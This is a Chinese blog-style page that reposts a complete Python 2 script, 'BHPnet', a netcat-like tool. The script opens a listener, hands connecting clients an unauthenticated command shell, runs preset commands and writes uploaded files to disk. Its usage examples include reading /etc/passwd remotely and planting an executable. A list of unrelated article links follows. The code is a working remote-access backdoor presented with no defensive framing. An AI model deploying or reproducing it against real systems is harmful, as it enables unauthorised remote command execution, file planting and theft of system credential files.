当前位置: 首页 > news >正文

[python开发模拟netcat工具] BHPnet

#!/usr/bin/python  
#-*- coding:utf8 -*-  
import sys  
import socket  
import getopt  
import threading  
import subprocess  
  
# 定义一些全局变量  
listen = False  
command = False  
upload = False  
execute = ""  
target = ""  
upload_destination = ""  
port = 0  
  
def run_command(command):  
  
    # 删除字符串末尾的空格  
    command = command.rstrip()  
    # 运行命令并将输出放回  
    try:  
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)  
    except:  
        output = "Failed to execute command.\r\n"  
    # 将输出发送  
    return output  
  
  
def client_handler(client_socket):  
    global upload  
    global execute  
    global command  
  
    # 检查上传文件  
    if len(upload_destination):  
        # 读取所有的字符并写下目标  
        file_buffer = ""  
        # 持续读取数据直到没有符合的数据  
        while True:  
            data = client_socket.recv(1024)  
  
            if not data:  
                break  
            else:  
                file_buffer += data  
  
        try:  
            file_descriptor = open(upload_destination, "wb")  
            file_descriptor.write(file_buffer)  
            file_descriptor.close()  
  
            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)  
        except:  
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)  
  
    # 检查命令执行  
    if len(execute):  
        # 运行命令  
        output = run_command(execute)  
        client_socket.send(output)  
  
  
    # 如果需要一个命令行shell,那么我们进入另一个循环  
    if command:  
        while True:  
            # 跳出一个窗口  
            client_socket.send("<BHP:#>")  
  
            cmd_buffer = ""  
            while "\n" not in cmd_buffer:  
                cmd_buffer += client_socket.recv(1024)  
            #  返回命令输出  
            response = run_command(cmd_buffer)  
            # 返回响应数据  
            client_socket.send(response)  
  
def server_loop():  
    global target  
  
    # 如果没有定义目标,那我们监听所有接口  
    if not len(target):  
        target = "0.0.0.0"  
  
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    server.bind((target, port))  
  
    server.listen(5)  
  
    while True:  
        client_socket, addr = server.accept()  
        # 分拆一个线程处理新的客户端  
        client_thread = threading.Thread(target=client_handler, args=(client_socket,))  
        client_thread.start()  
  
def client_sender(buffer):  
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
    try:  
        # 连接到目标主机  
        client.connect((target, port))  
  
        if len(buffer):  
            client.send(buffer)  
  
        while True:  
            # 现在等待数据回传  
            recv_len = 1  
            response = ""  
  
            while recv_len:  
                data = client.recv(4096)  
                recv_len = len(data)  
                response += data  
  
                if recv_len < 4096:  
                    break  
  
            print  response  
  
            # 等待更多的输入  
            buffer = raw_input("")  
            buffer += "\n"  
  
            # 发送出去  
            client.send(buffer)  
  
    except:  
        print "[*] Exception! Exiting."  
  
    #关闭连接  
    client.close()  
  
def usage():  
    print "BHP Net Tool"  
    print  
    print "Usage: bhpnet.py -t target_host - p port"  
    print "-l --listen              - listen on [host]:[port] for incoming connections"  
    print "-e --execute=file_to_run -execute the given file upon receiving a connection"  
    print "-c --command             - initialize a commandshell"  
    print "-u --upload=destination  - upon receiving connection upload a file and write to [destination]"  
    print  
    print  
    print "Examples:"  
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"  
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"  
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""  
    print "echo 'ABCDEFGHI' | python ./bhpnet.py -t 192.168.11.12 -p 135"  
    sys.exit(0)  
  
def main():  
    global listen  
    global port  
    global execute  
    global command  
    global upload_destination  
    global target  
  
    if not  len(sys.argv[1:]):  
        usage()  
  
  
    # 读取命令行选项,若没有该选项则显示用法  
    try:  
        opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",["help", "listen", "execute", "target", "port", "command", "upload"])  
    except getopt.GetoptError as err:  
        print str(err)  
        usage()  
  
  
    for o,a in opts:  
        if o in ("-h","--help"):  
            usage()  
        elif o in ("-l", "--listen"):  
            listen = True  
        elif o in ("-e", "--execute"):  
            execute = a  
        elif o in ("-c", "--commandshell"):  
            command = True  
        elif o in ("-u", "--upload"):  
            upload_destination = a  
        elif o in ("-t", "--target"):  
            target = a  
        elif o in ("-p", "--port"):  
            port = int(a)  
        else:  
            assert False,"Unhandled Option"  
  
    #我们是进行监听还是仅从标准输入读取数据并发送数据?  
    if not listen and len(target) and port > 0:  
  
        # 从命令行读取内存数据  
        # 这里将阻塞,所以不再向标准输入发送数据时发送CTRL-D  
        buffer = sys.stdin.read()  
  
        # 发送数据  
        client_sender(buffer)  
  
    # 我们开始监听并准备上传文件,执行命令  
    # 放置一个反弹shell  
    # 取决于上面的命令行选项  
    if listen:  
        server_loop()  
  
#调用main函数  
main()  

相关文章:

  • 算法讲解之Dynamic Programing —— 区间DP [变形:环形DP]
  • codevs 3304 水果姐逛水果街Ⅰ 题解
  • 算法讲解之Dynamic Programing —— 背包DP [资源分配问题]
  • [CDOJ 838]母仪天下 【线段树手速练习 15分钟内敲完算合格】
  • Lonlife-ACM 1014 - Absolute Defeat [差分]
  • [转]ACM 取石子问题
  • 浅谈CSRF攻击方式
  • Arp攻击实战
  • Web入侵攻击方式
  • STL之deque容器详解
  • [codevs 2822] 爱在心中 【tarjan 算法】
  • prim算法+优化 模版
  • 【NOIP2013】day1
  • 机器学习,深度学习等概念区别【转】
  • [codevs] 1029 遍历问题
  • 【译】JS基础算法脚本:字符串结尾
  • [LeetCode] Wiggle Sort
  • java B2B2C 源码多租户电子商城系统-Kafka基本使用介绍
  • JavaSE小实践1:Java爬取斗图网站的所有表情包
  • JS数组方法汇总
  • Linux编程学习笔记 | Linux IO学习[1] - 文件IO
  • Promise初体验
  • react 代码优化(一) ——事件处理
  • React组件设计模式(一)
  • SQLServer插入数据
  • 后端_ThinkPHP5
  • 聊聊redis的数据结构的应用
  • 实现菜单下拉伸展折叠效果demo
  • 使用 QuickBI 搭建酷炫可视化分析
  • 一个普通的 5 年iOS开发者的自我总结,以及5年开发经历和感想!
  • 移动端解决方案学习记录
  • 鱼骨图 - 如何绘制?
  • CMake 入门1/5:基于阿里云 ECS搭建体验环境
  • ​软考-高级-信息系统项目管理师教程 第四版【第14章-项目沟通管理-思维导图】​
  • #使用清华镜像源 安装/更新 指定版本tensorflow
  • (173)FPGA约束:单周期时序分析或默认时序分析
  • (20050108)又读《平凡的世界》
  • (6)【Python/机器学习/深度学习】Machine-Learning模型与算法应用—使用Adaboost建模及工作环境下的数据分析整理
  • (aiohttp-asyncio-FFmpeg-Docker-SRS)实现异步摄像头转码服务器
  • (java版)排序算法----【冒泡,选择,插入,希尔,快速排序,归并排序,基数排序】超详细~~
  • (Matalb时序预测)PSO-BP粒子群算法优化BP神经网络的多维时序回归预测
  • (二)构建dubbo分布式平台-平台功能导图
  • (附源码)spring boot北京冬奥会志愿者报名系统 毕业设计 150947
  • (排序详解之 堆排序)
  • (十)c52学习之旅-定时器实验
  • (学习日记)2024.03.25:UCOSIII第二十二节:系统启动流程详解
  • (原創) 如何解决make kernel时『clock skew detected』的warning? (OS) (Linux)
  • ./configure,make,make install的作用(转)
  • .axf 转化 .bin文件 的方法
  • .CSS-hover 的解释
  • .equal()和==的区别 怎样判断字符串为空问题: Illegal invoke-super to void nio.file.AccessDeniedException
  • .Net 知识杂记
  • .net6 webapi log4net完整配置使用流程
  • .NET8.0 AOT 经验分享 FreeSql/FreeRedis/FreeScheduler 均已通过测试
  • .NetCore实践篇:分布式监控Zipkin持久化之殇